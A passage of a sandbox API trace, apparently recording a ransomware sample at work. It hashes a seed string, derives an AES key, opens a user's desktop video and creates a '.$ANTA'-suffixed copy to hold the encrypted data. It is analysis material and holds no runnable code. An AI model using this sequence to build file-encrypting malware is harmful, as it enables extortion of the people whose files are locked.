lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.163] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0122.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca9e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.163] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2c08, dwDataLen=0x22, dwFlags=0x1) returned 1 [0122.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.164] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.164] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0122.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.164] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0122.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0122.165] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.165] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.165] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.166] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\bub qc_slq8o.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.166] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.166] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0122.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0122.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.166] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.167] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0122.167] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0122.168] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0122.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0122.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\bub qc_slq8o.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.209] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.209] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.209] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0122.209] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0122.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0122.212] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.212] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x5c27, lpOverlapped=0x0) returned 1 [0122.214] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5c27) returned 0x49aa010 [0122.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0122.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0122.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5c27) returned 0x49afc40 [0122.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.218] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5c27) returned 0x49aa010 [0122.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.219] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: 